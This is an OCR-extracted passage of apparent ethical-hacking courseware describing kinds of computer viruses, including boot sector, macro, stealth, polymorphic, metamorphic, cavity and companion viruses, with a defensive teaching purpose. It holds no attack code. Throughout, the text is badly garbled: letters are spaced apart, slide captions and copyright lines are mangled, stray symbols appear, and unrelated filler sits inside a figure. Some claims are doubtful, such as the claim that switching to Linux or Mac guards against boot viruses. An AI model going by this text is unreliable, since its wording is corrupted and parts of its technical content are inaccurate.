f l o p p y disk. T h e se v iru s e s g e n e r a lly re s id e in t h e m e m o r y . T h e y can also be c a u se d b y T ro ja n s .
S o m e s e c t o r v iru s e s also s p re a d t h r o u g h i n f e c t e d file s , a n d t h e y a re ca lle d m u l t i p a r t v iru s e s .



Viruses and W orm s

1


Virus Rem oval
S y s te m s e c t o r v iru s e s a re d e s ig n e d t o c r e a te t h e illu s io n t h a t t h e r e is n o v ir u s o n t h e
s y s te m . O n e w a y t o d ea l w i t h t h is v ir u s is t o a v o id t h e use o f t h e W i n d o w s o p e r a t i n g

s y s t e m , a n d s w it c h t o L in ux o r M a cs, b e c a u s e W i n d o w s is m o r e p r o n e t o th e s e a tta c k s . L inux
a n d M a c i n t o s h h a v e a b u i l t - i n s a f e g u a r d t o p r o t e c t a g a in s t th e s e v iru s e s . T h e o t h e r w a y is t o
c a r r y o u t a n t i v i r u s ch e c k s o n a p e r io d ic basis.

Before Infection

G
After Infection
V

O
Virus Code

FIGURE 7.6: System or Boot Sector Viruses



Viruses and W orm s


File and Multipartite Viruses

CEH

F ile a n d M u ltip a rtite V iru s e s
F ile Viruses
File v iru s e s i n f e c t file s t h a t a re e x e c u te d o r i n t e r p r e t e d in t h e s y s te m such as C O M , EXE,
SYS, OVL, OBJ, PRG, M N U , a n d BAT file s. File v iru s e s can be e i t h e r d i r e c t - a c t i o n ( n o n - r e s i d e n t )
o r m e m o r y - r e s i d e n t . O v e r w r i t i n g v iru s e s ca use i r r e v e r s i b l e d a m a g e t o t h e files. T h e s e v iru s e s
m a i n l y t a r g e t a r a n g e o f o p e r a t i n g s y s te m s t h a t in c lu d e W i n d o w s , UNIX, DOS, a n d M a c i n t o s h .

C h a ra c te riz in g F ile V iruses
File v iru s e s a re

m a i n l y c h a r a c te r iz e d

and

d e s c r ib e d

b ase d

on

th e ir

p h ysica l

b e h a v io r o r

c h a r a c te r is t ic s . T o cla ssify a file v ir u s is b y t h e t y p e o f file t a r g e t e d by it, such as EXE o r C O M
file s, t h e b o o t s e c to r , e tc. A f ile v ir u s can also be c h a r a c t e r iz e d b ase d o n h o w it i n f e c ts t h e
t a r g e t e d file (also k n o w n as t h e h o s t files):
Q

P re p e n d in g : w r i t e s it s e lf i n t o t h e b e g in n in g o f t h e h o s t file 's c o d e

Q

A p p e n d in g : w r i t e s it s e lf t o t h e e n d o f t h e h o s t file

©

O v e rw ritin g : o v e r w r i t e s t h e h o s t file 's c o d e w i t h its o w n c o d e

Q

In s ertin g : in s e rts it s e lf i n t o gaps in s id e t h e h o s t file 's c o d e



Viruses and W orm s


©

C o m p a n io n : r e n a m e s t h e o rig in a l f ile a n d w r i t e s it s e lf w i t h t h e h o s t file 's n a m e

©

C av ity in fe c to r: w r i t e s it s e lf b e t w e e n file s e c tio n s o f 3 2 - b i t file

File v iru s e s a re also cla ssifie d b ase d o n w h e t h e r t h e y a re n o n - m e m o r y r e s i d e n t o r m e m o r y
r e s id e n t. N o n - m e m o r y r e s i d e n t v iru s e s s e a rch f o r EXE fi l e s o n a h a r d d r iv e a n d t h e n i n f e c t
t h e m , w h e r e a s m e m o r y r e s i d e n t v iru s e s sta ys a c tiv e ly in m e m o r y , a n d t r a p o n e o r m o r e s y s te m
f u n c t io n s . File v iru s e s a re said t o be p o l y m o r p h i c , e n c r y p t e d , o r n o n - e n c r y p t e d . A p o l y m o r p h i c
o r e n c r y p t e d v ir u s c o n t a in s o n e o r m o r e d e c r y p t o r s a n d a m a in co d e . M a i n v ir u s c o d e is
d e c r y p t e d b y t h e d e c r y p t o r b e f o r e i t s ta rts . A n e n c r y p t e d v ir u s u s u a lly uses v a r ia b le o r fi x e d k e y d e c r y p t o r s , w h e r e a s p o l y m o r p h i c v iru s e s h a ve d e c r y p t o r s t h a t a re r a n d o m l y g e n e r a t e d
f r o m i n s t r u c t i o n s o f p r o c e s s o rs a n d t h a t c o n s is t o f a l o t o f c o m m a n d s t h a t a re n o t used in t h e
d e c r y p t i o n p ro c e s s .
E xecu tio n o f P aylo ad:
©
©

T im e b o m b : A f t e r a s p e c ifie d p e r io d o f t i m e

©

Q

D ir e c t a c tio n : I m m e d i a t e l y u p o n e x e c u t io n

C o n d i t i o n t r ig g e r e d : O n ly u n d e r c e r ta in c o n d it io n s

M ultip artite Viruses
A m u l t i p a r t i t e v ir u s is also k n o w n as a m u l t i - p a r t v i r u s t h a t a t t e m p t s t o a t t a c k b o t h

t h e b o o t s e c t o r a n d t h e e x e c u ta b le o r p r o g r a m file s a t t h e s a m e t i m e . W h e n r g w v ir u s is
a t t a c h e d t o t h e b o o t s e c to r , it w i ll in t u r n a f f e c t t h e s y s te m file s , a n d t h e n t h e v ir u s a tta c h e s t o
t h e file s, a n d t h is t i m e it w ill in t u r n i n f e c t t h e b o o t s e c to r .

FIGURE 7.7: File and Multipartite Viruses



Viruses and W orm s


CEH

M a c r o V ir u s e s

14

Urt fw

ilhiul lUtbM

0

0
11.
Infects Macro Enabled Documents

0

Attacker

User

0
r

0

0
‫ץ‬
0 Macro viruses infect
templates or convert
infected documents
into template files,
while maintainingtheir
appearance of ordinary
documentfiles

0 Most macro viruses are
written using macro
language Visual Basic
for Applications (VBA)

r

V

0

0

0

0

Copyright © by E -CIllicit Al 1Rights Reserved. Reproduction is Strictly Prohibited.
Ca

M a c ro V iru se s
M i c r o s o f t W o r d o r s i m i l a r a p p li c a t i o n s can be i n f e c t e d t h r o u g h a c o m p u t e r v i r u s
c a lle d m a c r o v iru s , w h i c h a u t o m a t i c a l l y p e r f o r m s a s e q u e n c e o f a c tio n s w h e n t h e a p p li c a t i o n is
t r i g g e r e d o r s o m e t h i n g else. M o s t m a c r o v iru s e s a re w r i t t e n u s in g t h e m a c r o la n g u a g e V is u a l
Basic f o r A p p l i c a t i o n s (V B A ) a n d t h e y i n f e c t t e m p l a t e s o r c o n v e r t i n f e c t e d d o c u m e n t s i n t o
t e m p l a t e file s, w h i l e m a i n t a i n in g t h e i r a p p e a r a n c e o f o r d i n a r y d o c u m e n t file s. M a c r o v ir u s e s
a re s o m e w h a t less h a r m f u l t h a n o t h e r ty p e s . T h e y a re u s u a lly s p re a d via an e m a il. P ure d a ta
file s d o n o t a l l o w t h e s p re a d o f v iru s e s , b u t s o m e t i m e s t h e lin e b e t w e e n a d a ta f ile a n d an
e x e c u t a b l e f i l e is e a sily o v e r l o o k e d by t h e a v e r a g e u se r d u e t o t h e e x te n s iv e m a c r o la n g u a g e s
in s o m e p r o g r a m s . In m o s t cases, j u s t t o m a k e t h in g s easy f o r users, t h e lin e b e t w e e n a d a ta file
a n d a p r o g r a m s ta r t s t o b lu r o n l y in cases w h e r e t h e d e f a u l t m a c r o s a re s e t t o ru n a u t o m a t i c a l l y
e v e r y t i m e t h e d a ta file is lo a d e d . V ir u s w r i t e r s can e x p l o i t c o m m o n p r o g r a m s w i t h m a c r o
c a p a b i l it y such as M i c r o s o f t W o r d , Excel, a n d o t h e r O ffic e p r o g r a m s . W i n d o w s H e lp file s can
also c o n t a i n m a c r o c o d e . In a d d it io n , t h e la t e s t e x p l o i t e d m a c r o c o d e e xists in t h e fu ll v e r s io n o f
t h e A c r o b a t p r o g r a m t h a t re a d s a n d w r i t e s PDF files.



Viruses and W orm s


Infects M acro Enabled Documents

Attacker

User
FIGURE 7.8: Macro Viruses



Viruses and W orm s


C EH

C lu s te r V ir u s e s
C luster V iruses
J

a

Cluster viruses modify directory table entries so that it
points users or system processes to the virus code instead
of the actual program

:‫ ב‬I ■ ■ ■
‫] * :ן‬

V iru s Copy
J

There is only one copy of the virus on the disk infecting
all the programs in the computer system

Launch Its e lf
J

It will launch itself first when any program on the
computer system is started and then the control is
passed to actual program

Copyright © by EC auactl. All Rights Reserved. Reproduction is Strictly Prohibited
-C

C lu s te r V iru se s
C lu s te r v iru s e s in f e c t file s w i t h o u t c h a n g in g t h e file o r p la n t in g e x tr a file s t h e y c h a n g e
t h e DOS d i r e c t o r y i n f o r m a t i o n so t h a t e n t r i e s p o i n t t o t h e v ir u s c o d e in s te a d o f t h e a c tu a l
p r o g r a m . W h e n a p r o g r a m r u n s DOS, it f i r s t lo a d s a n d e x e c u te s t h e v iru s c o d e , a n d t h e n t h e
v ir u s lo c a te s t h e a c tu a l p r o g r a m a n d e x e c u te s it. D ir-2 is an e x a m p le o f t h is t y p e o f v iru s .
C lu s te r v iru s e s m o d i f y d i r e c t o r y t a b l e e n t r i e s so t h a t d i r e c t o r y e n t r i e s p o i n t t o t h e v ir u s c o d e .
T h e r e is o n l y o n e c o p y o f t h e v ir u s o n t h e d is k i n f e c t i n g all t h e p r o g r a m s in t h e c o m p u t e r
s y s te m . It w i ll la u n c h i t s e lf f i r s t w h e n a n y p r o g r a m o n t h e c o m p u t e r s y s te m is s t a r t e d a n d t h e n
t h e c o n t r o l is p assed t o t h e a c tu a l p r o g r a m .



Viruses and W orm s


S te a lth /T u n n e lin g V ir u s e s

CEH

These viruses evade the anti-virus software by intercepting its requests
to the operating system
A virus can hide itself by intercepting the anti-virus software's request to
read the file and passingthe request to the virus, instead of the OS
The virus can then return an uninfected version of the file to the antivirus software, so that it appears as if the file is "clean"

Hides Infected
TCPIP.SYS

i f

Here you go

Original TCPIP.SYS
Copyright © by EC auactl. All Rights Reserved. Reproduction is Strictly Prohibited.
-C

S te a lth /T u n n e lin g V iru se s
I

S te a lth V ir u s e s
T h e s e v iru s e s t r y t o h id e t h e m s e l v e s f r o m a n t i v i r u s p r o g r a m s by a c tiv e ly a lt e r in g a nd

c o r r u p t i n g t h e c h o s e n s e rv ic e call i n t e r r u p t s w h e n t h e y a re b e in g ru n . R e q u e s ts t o p e r f o r m
o p e r a t i o n s in r e s p e c t t o th e s e se rv ic e call i n t e r r u p t s a re r e p la c e d by v iru s c o d e . T h e se v iru s e s
s ta te fa lse i n f o r m a t i o n t o h id e t h e i r p r e s e n c e f r o m a n t i v i r u s p r o g r a m s . For e x a m p le , t h e s t e a l t h
v i r u s h id e s t h e o p e r a t i o n s t h a t it m o d i f i e d a n d g ive s fa ls e r e p r e s e n t a t i o n s . T hu s, it ta k e s o v e r
p o r t i o n s o f t h e t a r g e t s y s te m a nd h id e s its v ir u s co d e .
T h e s t e a lt h v iru s h id e s it s e lf f r o m a n t i v i r u s s o f t w a r e by h id in g t h e o rig in a l size o f t h e file o r
t e m p o r a r i l y p la c in g a c o p y o f it s e lf in s o m e o t h e r d r iv e o f t h e s y s te m , t h u s r e p la c in g t h e
i n f e c t e d file w i t h t h e u n i n f e c t e d file t h a t is s t o r e d o n t h e h a r d d riv e .
A s t e a lt h v ir u s h id e s t h e m o d if ic a t i o n s t h a t it m a k e s . It ta k e s c o n t r o l o f t h e s y s te m 's f u n c t io n s
t h a t re a d file s o r s y s te m s e c to r s a n d , w h e n a n o t h e r p r o g r a m r e q u e s ts i n f o r m a t i o n t h a t has
a lr e a d y b e e n m o d i f i e d by t h e v iru s , t h e s t e a l t h v i r u s r e p o r t s t h a t i n f o r m a t i o n t o t h e r e q u e s t i n g
p r o g r a m in s te a d . T his v ir u s a lso re s id e s in t h e m e m o r y .
T o a v o id d e t e c t i o n , th e s e v iru s e s a lw a y s t a k e o v e r s y s te m f u n c t i o n s a n d use t h e m t o h id e t h e i r
p re s e n c e .



Viruses and W orm s


O n e o f t h e c a rr ie r s o f t h e s t e a lth v ir u s is t h e r o o t k i t . In s ta llin g a r o o t k i t g e n e r a l l y r e s u lts in t h is
v ir u s a t t a c k b e c a u s e r o o t k i t s a re in s t a lle d via T ro ja n s , a n d t h u s a re c a p a b le o f h id in g a n y
m a lw a re .
R e m o v a l:
Q

A lw a y s d o a c o ld b o o t ( b o o t f r o m w r i t e - p r o t e c t e d f l o p p y d isk o r CD)

©

N e v e r use DOS c o m m a n d s such as FDISK t o fix t h e v iru s

e

Use a n t i v i r u s s o f t w a r e

/

Tunneling Viruses
T h e s e v iru s e s t r a c e t h e s te p s o f i n t e r c e p t o r p r o g r a m s t h a t m o n i t o r o p e r a t i n g s y s t e m

r e q u e s ts so t h a t t h e y g e t i n t o BIOS a n d DOS t o in s ta ll th e m s e lv e s . To p e r f o r m th is a c tiv it y , t h e y
even tu n n e l u n d e r a n tiv iru s s o ftw a re p ro g ra m s.
Give me the system file

tcpip.syi to icon

Anti-virus
Software

Hides Infected
TCPIP.SYS

*

VIRUS

Here you go
Original TCPIP.SYS
FIGURE 7.9: Working of Stealth/Tunneling Viruses



Viruses and W orm s


CEH

E n c r y p tio n V ir u s e s
‫־׳י‬

‫י‬
This type of virus uses simple
encryption to encipher the code

Virus Code

V
r

The virus is encrypted with
a different key for each
infected file

V.

AV scanner cannot directly
detect these types of
viruses using signature
detection methods

‫ץ‬
Encryption
Virus 2

Encryption
Virus 3

-/

Copyright © by E&

E n c ry p tio n V iru se s
T his t y p e o f v ir u s co n s is ts o f an e n c r y p t e d c o p y o f t h e v iru s a nd a d e c r y p t i o n m o d u l e .
T h e d e c r y p t i n g m o d u l e r e m a in s c o n s t a n t , w h e r e a s t h e d i f f e r e n t keys a re u sed f o r e n c r y p t i o n .
T h e s e v iru s e s g e n e r a l l y e m p l o y XO R o n e a ch b y te w i t h a r a n d o m i z e d key.
©

T h e v ir u s is e n c i p h e r e d w i t h an e n c r y p t i o n k e y t h a t co n s is ts o f a d e c r y p t i o n m o d u l e a nd
an e n c r y p t e d c o p y o f t h e c o d e .

Q

For e a ch i n f e c t e d file , t h e v ir u s is e n c r y p t e d b y u sin g a d i f f e r e n t c o m b i n a t i o n o f keys,
b u t t h e d e c r y p t i n g m o d u l e p a r t r e m a in s u n c h a n g e d .
It is n o t

p o s s ib le f o r t h e v ir u s s c a n n e r t o

d ir e c t ly

d e te c t th e

v ir u s

by m e a n s o f

s ig n a t u r e s , b u t t h e d e c r y p t i n g m o d u l e ca n be d e t e c t e d .
e

T h e d e c r y p t i o n t e c h n i q u e e m p lo y e d is x o r e a ch b y te w i t h a r a n d o m i z e d ke y t h a t is
g e n e r a t e d a n d sa ved b y t h e r o o t v iru s .



Viruses and W orm s


Virus Code

Encryption
Virus 1

Encryption
Virus 2

Encryption
Virus B

FIGURE 7.10: Working of Encryption Viruses



Viruses and W orm s


CEH

P o ly m o r p h ic C o d e
J

Polymorphic code is a code that mutates while keeping the original algorithm intact

J

To enable polymorphic code, the virus has to have a polymorphic engine (also called
mutating engine or mutation engine

J

A well-written polymorphic virus therefore has no parts that stay the same on each
infection

39Encrypted Mutation
Engine

Encrypted Virus
Code

Decryptor Routine

............
Decryptor
routine decrypts
virus code and
mutation engine

New Polymorphic
Virus
User Runs an
Infected Program

RAM

P o ly m o rp h ic C o d e
P o l y m o r p h ic v iru s e s m o d i f y t h e i r c o d e f o r e a ch r e p li c a t i o n in o r d e r t o a v o i d d e t e c t i o n .
T h e y a c c o m p lis h t h is b y c h a n g in g t h e e n c r y p t i o n m o d u l e a nd t h e i n s t r u c t i o n s e q u e n c e . A
r a n d o m n u m b e r g e n e r a t o r is used f o r i m p l e m e n t i n g p o l y m o r p h i s m .
A m u t a t i o n e n g in e is g e n e r a l l y used t o e n a b le p o l y m o r p h i c c o d e . T h e m u t a t o r p r o v id e s a
s e q u e n c e o f i n s t r u c t i o n s t h a t a v i r u s s c a n n e r can use t o o p t i m i z e an a p p r o p r i a t e d e t e c t i o n
a lg o r i t h m . S lo w p o l y m o r p h i c c o d e s a re u sed t o p r e v e n t a n t i v i r u s p r o f e s s i o n a l s f r o m accessing
th e codes.
V ir u s s a m p le s , w h i c h a re b a it file s a f t e r a s ing le e x e c u t i o n is i n f e c t e d , c o n t a i n a s i m i l a r c o p y o f
t h e viru s . A s im p le i n t e g r i t y c h e c k e r is used t o d e t e c t t h e p r e s e n c e o f a p o l y m o r p h i c v iru s in th e
s y s te m 's disk.



Viruses and W orm s


Encrypted Mutation
Engine (EME)
ncrypted M utation
j ‫ י‬Encry
Engine
i I

A

©

Encrypted Virus
Code

I

Decryptor Routine

A

Instruct to •
0

i

• Instruct to

Decryptor
routine decrypts
virus code and
mutation engine

New Polymorphic

*

©

Virus Does the Damage

User Runs an
Infected Program

Virus

RAM

FIGURE 7.11: How Polymorphic Code Work

P o l y m o r p h ic v iru s e s c o n s is t o f t h r e e c o m p o n e n t s . T h e y a re t h e e n c r y p t e d v i r u s c o d e , t h e
d e c r y p t o r r o u t i n e , a n d t h e m u t a t i o n e n g in e . T h e f u n c t i o n o f t h e d e c r y p t o r r o u t i n e is t o d e c r y p t
t h e v ir u s c o d e . It d e c r y p t s t h e c o d e o n l y a f t e r t a k i n g c o n t r o l o v e r t h e c o m p u t e r . T h e m u t a t i o n
e n g in e g e n e r a t e s r a n d o m i z e d d e c r y p t i o n r o u t in e s . T his d e c r y p t i o n r o u t i n e s v a rie s e v e r y t i m e
w h e n a n e w p r o g r a m is i n f e c t e d by t h e viru s .
W i t h a p o l y m o r p h i c v iru s , b o t h t h e m u t a t i o n e n g in e a n d t h e v ir u s c o d e a re e n c r y p t e d . W h e n a
p r o g r a m t h a t is i n f e c t e d w i t h a p o l y m o r p h i c v ir u s is ru n b y t h e user, t h e d e c r y p t o r r o u t i n e ta k e s
c o m p l e t e c o n t r o l o v e r t h e s y s te m , a f t e r w h i c h it d e c r y p t s t h e v iru s c o d e a n d t h e m u t a t i o n
e n g in e . N e x t, t h e c o n t r o l o f y o u r s y s te m is t r a n s f e r r e d by t h e d e c r y p t i o n r o u t i n e t o t h e v iru s ,
w h i c h lo c a te s a n e w p r o g r a m t o in f e c t. In R A M ( R a n d o m Access M e m o r y ) , t h e v ir u s m a k e s a
r e p lic a o f it s e lf as w e l l as t h e m u t a t i o n e n g in e . T h e n t h e v ir u s in s t r u c t s t h e e n c r y p t e d m u t a t i o n
e n g in e

to

g en erate

a new

ra n d o m iz e d

d e c ry p tio n

ro u tin e ,

w h ic h

has t h e

c a p a b i l it y

of

d e c r y p t i n g v iru s . H ere, t h is n e w c o p y o f b o t h t h e v ir u s c o d e a n d m u t a t i o n e n g in e is e n c r y p t e d
by t h e v iru s . T hu s, t h is v iru s , a lo n g w i t h t h e

n e w ly e n c ry p te d v iru s co d e and e n c ry p te d

m u t a t i o n e n g in e (EM E), a p p e n d s t h is n e w d e c r y p t i o n r o u t i n e o n t o a n e w p r o g r a m , t h e r e b y
c o n t i n u i n g t h e pro cess .
P o l y m o r p h ic v iru s e s t h a t re s p re a d b y t h e a t t a c k e r in t a r g e t e d s y s te m s a re d i f f i c u l t t o d e t e c t
b e c a u s e h e r e t h e v ir u s b o d y is e n c r y p t e d a n d t h e d e c r y p t i o n r o u t i n e s c h a n g e s e ach t i m e f r o m
in f e c t i o n t o i n f e c t i o n a n d n o t w o in f e c t i o n s lo o k t h e s a m e ; th is m a k e it d i f f i c u l t f o r t h e v iru s
s c a n n e r t o i d e n t i f y t h is v iru s .



Viruses and W orm s


M e ta m o r p h ic V ir u s e s
M e ta m o rp h ic V iru s e s

M e ta m o rp h ic C o d e

Metamorphic viruses
rewrite themselves
completely each time they
are to infect new
executable

Metamorphic code can
reprogram itself by
translating its own code into
a temporary representation
and then back to the normal
code again

CEH

UrtMM itkNjI lUilwt

MotaphoR V I by tHE moNTAL D illlei/2 9*

For example, W32/Simile
consisted of over 14000
lines of assembly code,
90% of it is part of the
metamorphic engine

E3

M
etaphoRV bj •H m LDI# /29*
I
E tfJTA < h

E l

a V tA
.) arian

c T e"U official” V t C
.) h n
arian
at IAHM 1 IL bY iH ni Ntnl cttllller/^JA
J
fc

m tA G 1b B tH•
E PH R Y

A
1LER/2*

r£TAfSC« iCbVlHE n£W dFIIUi/2^
»4l

E l

[1E

b.) V a ria n t B

I

d .) T h e .D v a ria n t ( w h ic h w a s th e
* o ffic ia l' C o f t h e o rig in a l a u th o r)

Copyright © by E&

M e ta m o rp h ic V iru se s
S o m e v iru s e s r e w r i t e t h e m s e l v e s t o in f e c t n e w l y e x e c u te d files. Such v iru s e s are
c o m p le x a n d use m e t a m o r p h i c e n g in e s f o r e x e c u t io n .
A c o d e t h a t can r e p r o g r a m it s e lf is c a lle d m e t a m o r p h i c c o d e . T his c o d e is t r a n s l a t e d i n t o t h e
t e m p o r a r y c o d e , a n d t h e n c o n v e r t e d b a ck t o t h e n o r m a l c o d e . This t e c h n i q u e , in w h i c h t h e
o rig in a l a l g o r i t h m r e m a in s in t a c t , is used t o a v o id p a t t e r n r e c o g n i t i o n o f a n t i v i r u s s o f t w a r e .
This is m o r e e f f e c t i v e in c o m p a r i s o n t o p o l y m o r p h i c c o d e . T his t y p e o f v ir u s c o n s is ts o f c o m p le x
e x te n s iv e c o d e .
T h e c o m m o n l y k n o w n m e t a m o r p h i c v iru s e s a re :
W in 3 2 /S im ile :
T his v ir u s is w r i t t e n in a s s e m b ly la n g u a g e a n d d e s t i n e d f o r M i c r o s o f t W i n d o w s . T his p ro c e s s is
c o m p le x , a n d n e a r ly 9 0 % o f v i r u s c o d e s a re g e n e r a t e d b y t h is pro cess.
Z m ist:
Z m is t is also k n o w n as t h e Z o m b ie . M is t f a l l is t h e f i r s t v i r u s t o use t h e t e c h n i q u e c a lle d " c o d e
i n t e g r a t i o n . " T his c o d e in s e rts i t s e lf i n t o o t h e r c o d e , r e g e n e r a t e s t h e c o d e , a n d r e b u ild s t h e
e x e c u ta b le .



Viruses and W orm s


□

a.) Variant A

c.) The "Unofficial" Variant C

Im ElAPHOR 1b BY tHe MeNTAI drilLER/29A

12

mEtAPHOR 1b BY tHe MeNTAI di!LER/
r o in

b.) Variant B

aA

m

mETAPhOr 1C bY tHE mENtal dRllle1/29A

Q

mETAPhOr 1C bY (HE mENtal dRlller/29A

‫ .....ו‬ok...‫ך‬

d.) The .D variant (which was the
"official" C of the original author)
FIGURE 7.12: Metamorphic Viruses Screenshot



Viruses and W orm s


File Overwriting or Cavity Viruses

CEH

Cavity Virus overwrites a part of the host file with a constant
(usually nulls), without increasingthe length of the file and
preserving its functionality

Sales and marketing management is the
leading authority for executives in the sales
and marketing management industries
The suspect, Desmond Turner, surrendered to
authorities at a downtown Indianapolis fast-food
restaurant

Null

Null

Null

Null

Null

Null

Null

Null

Null

Null

Null

Null

Null

Null

Null

Null

Null

Null

Null

Null

Null

Null

Null

Null

Null

Null

Null

Null

Null

Null

Null

Null

Null

Original File
Size: 45 KB

Null

Null

N U ll

Null

Null

Null

Null

Null

■2> a
■ 3

Null

Infected File
Size: 45 KB


F ile O v e r w r itin g o r C a v ity V iru s e s
T h e s e are also k n o w n as s p a c e -fille r s since t h e y m a i n t a i n a c o n s t a n t file -s iz e w h i l e
i n f e c t e d b y in s t a llin g t h e m s e l v e s i n t o t h e t a r g e t p r o g r a m . T h e y a p p e n d t h e m s e l v e s t o t h e e n d
o f file s a n d also c o r r u p t t h e s t a r t o f files. T his t r i g g e r e v e n t f i r s t a c tiv a te s a n d e x e c u te s t h e v iru s
c o d e , a n d l a t e r t h e o rig in a l a p p li c a t i o n p r o g r a m .
S o m e p r o g r a m file s h a ve a re a s o f e m p t y sp ace . T his e m p t y sp ace is t h e m a in t a r g e t o f th e s e
v iru s e s . T h e C a v it y V ir u s , a lso k n o w n as t h e Space F ille r V iru s , s to re s its c o d e in t h is e m p t y
space. T h e v iru s in s ta lls it s e lf in t h i s u n o c c u p ie d space w i t h o u t a n y d e s t r u c t i o n t o t h e o rig in a l
c o d e . It in s ta lls it s e lf in t h e file it a t t e m p t s t o in fe c t.
T his t y p e o f v ir u s is r a r e ly used b e c a u s e it is d i f f i c u l t t o w r i t e . A n e w W i n d o w s file ca lle d th e
P o r t a b l e E x e c u t a b le it d e s ig n e d f o r t h e fa s t lo a d in g o f p r o g r a m s . H o w e v e r , it lea ves a c e r ta in
g ap in t h e f ile w h i l e it is b e in g e x e c u t e d t h a t can be used by t h e Space F ille r V ir u s t o i n s e r t
its e lf. T h e m o s t p o p u l a r v ir u s f a m i l y is t h e CIH v ir u s .

Original File
Size: 45 KB

I

h

.............................................................................^

PDF

L

>1

Infected File
Size: 45 KB

PDF

FIGURE 7 .1 3 : File O v e r w ritin g o r C a v ity V iru s



Viruses and W orm s


S p a r se I n fe c to r V ir u s e s
M

ir
S parse In fe c to r Virus
J

Sparse infector virus infects only occasionally (e.g. every
tenth program executed), or only files whose lengths fall
within a narrow range

D iffic u lt to D e te c t
J

By infecting less often, such viruses try to minimize the
probability of being discovered

In fe c tio n Process

Wake up on 15* of
every month and execute code

-C

S p a rse In fe c to r V iru se s
Sparse i n f e c t o r v iru s e s in f e c t o n l y o c c a s io n a lly (e.g., e v e r y t e n t h p r o g r a m e x e c u t e d o r
o n p a r t i c u l a r d a y o f t h e w e e k ) o r o n l y file s w h o s e l e n g t h s fa ll w i t h i n a n a r r o w r a n g e . By
i n f e c t i n g less o f t e n , th e s e v iru s e s t r y t o m in i m i z e t h e p r o b a b i l i t y o f b e in g d is c o v e r e d .

Wake up on 15th of
every month and execute code

FIGURE 7.14: Working of Sparse Infector Viruses



Viruses and W orm s


Companion/Camouflage Viruses I C EH

A Companion virus creates a companion file for each
executable file the virus infects

A

Therefore, a companion virus may save itself as notepad.com and every
time a user executes notepad.exe (good program), the computer will load
notepad.com (virus) and infect the system

Virus infects the system with
a file notepad.com and saves
it in c:winntsystem32directory
...

1
Attacker

1

/

£

N otepad.exe

Notepad.com

-C

C o m p a n io n /C a m o u fla g e V iru se s
Com panion Viruses
4

T h e c o m p a n i o n v ir u s s to r e s it s e lf b y h a v in g t h e id e n t ic a l file n a m e as t h e t a r g e t e d

p r o g r a m f i l e . As s o o n as t h a t f ile is e x e c u te d , t h e v ir u s i n f e c ts t h e c o m p u t e r , a n d h a rd d isk d a ta
is m o d if ie d .
C o m p a n io n v iru s e s use DOS t h a t r u n C O M file s b e f o r e t h e EXE file s are e x e c u te d . T h e v ir u s
in s ta lls an id e n t ic a l C O M file a nd i n f e c ts t h e EXE files.
S o u rc e : h t t p : / / w w w . c k n o w . c o m / v t u t o r / C o m p a n i o n V i r u s e s . h t m l
H e re is w h a t h a p p e n s : S u p p o s e a c o m p a n i o n v ir u s is e x e c u t in g o n y o u r PC a n d d e c id e s it is t i m e
t o in f e c t a file . It lo o k s a r o u n d a n d h a p p e n s t o f i n d a f ile c a lle d PGM.EXE. It n o w c r e a te s a file
ca lle d P G M .C O M , c o n t a i n i n g t h e v iru s . T h e v ir u s u s u a lly p la n t s t h is file in t h e s a m e d i r e c t o r y as
t h e .EXE file , b u t it c o u ld p la ce it in a n y d i r e c t o r y o n y o u r DOS p a t h . If y o u t y p e P G M a n d press
E n te r, DOS e x e c u te s P G M .C O M in s te a d o f PG M .E XE . (In o r d e r , DOS w ill e x e c u te C O M , t h e n
EXE, a n d t h e n BAT file s o f t h e s a m e r o o t n a m e , if t h e y a re all in t h e s a m e d ir e c t o r y . ) T h e v iru s
e x e c u te s ,

p o s s ib ly i n f e c t i n g

m o r e file s , a n d t h e n

lo a d s a n d

e x e c u te s

PGM.EXE. T h e

u ser

p r o b a b l y w o u l d fa il t o n o t i c e a n y t h i n g is w r o n g . It is easy t o d e t e c t a c o m p a n i o n v i r u s j u s t by
t h e p r e s e n c e o f t h e e x tr a C O M f ile in t h e s y s te m .



Viruses and W orm s


Virus infects the system with
a file notepad.com and saves
It In c:wlnntsystem32 directory

Attacker

V
Notepad.exe

Notepad.com

FIGURE 7.15: Working of Companion/Camouflage Viruses



Viruses and W orm s


c EH

S h e ll V ir u s e s
J

(c ifw Ith Jl lUk
it d M cM

Virus code form s a shell aro u n d th e target host program 's co d e, making
itself th e original program and host code as its sub-routine

J

[4 U « 1

Alm ost all boot program v iru se s are shell viruses

Before Infection

Original Program

After Infection

‫ ־‬Virus Code--- >

Original Program

-C

Ilf

S h e ll V ir u s e s
A s h ell v ir u s c o d e f o r m s a la y e r a r o u n d t h e t a r g e t h o s t p r o g r a m 's c o d e t h a t can be

c o m p a r e d t o an " e g g s h e l l / ' m a k in g its e lf t h e o rig in a l p r o g r a m a n d t h e h o s t c o d e its s u b r o u t i n e . H e re , t h e o rig in a l c o d e is m o v e d t o a n e w l o c a t io n b y t h e v iru s c o d e a n d t h e v iru s
a s s u m e s its i d e n t it y .

B efo re In fe c tio n

Original Program

A fte r In fe c tio n

Virus Code

Original Program

FIGURE 7 .1 6 : W o rk in g o f S hell V iru s e s



Viruses and W orm s


CEH

F ile E x te n s io n V ir u s e s
F ld r O tio s
oe p n

File Extension Viruses
General

J F extension viruses change the
ile
extensions of files

Search

Folder views
You can apply the view (such as Detais or Icons) that
you are us*1g for this folder to al folders of this type
Apply to Folders

J .TX is safe a it indicates a pure text
T
s
file

Advanced settings:

J W extensions turned off, if som
ith
eone
sends you a file nam B D T.V S
ed A .TX B ,
you w only see B D T
ill
A .TX

Fies and Folders
□ Always show icons, never thumbnails
I I Always show menus
@ Display Me icon on thumbnails

J If you have forgotten that extensions
are turned off, you m think this isa
ight
text file and open it

0

J This is an executable Visual B
asic
Script virus file and could do serious
dam
age

y

□

Display He size nfoimation m folder tps
Display the full path in the title bar

J l Hdden Mes and folders

O Don‫ ז‬show hidden files, folders, or dnves
(§) Show hidden files, folders, and dnves
Hide cmgty dnves in the Computer folder

V . Ude folder merge conflicts

Restore QfifoJls

J Counterm
easure isto turn off "Hide
file extensions" in W
indows

* Py
P*

-C

F ile E x te n s io n V iru s e s

u

S o u rc e : h t t p : / / w w w . c k n o w . c o m / v t u t o r / F i l e E x t e n s i o n s . h t m l
©

File e x t e n s io n v iru s e s c h a n g e t h e e x te n s io n s o f file s

Q

.TXT is safe as it in d ic a te s a p u r e t e x t file

Q

W i t h e x te n s io n s a re t u r n e d o ff, if s o m e o n e se nd s y o u a f ile n a m e d BAD.TXT.VBS, y o u
can o n l y see BA D .T X T

Q

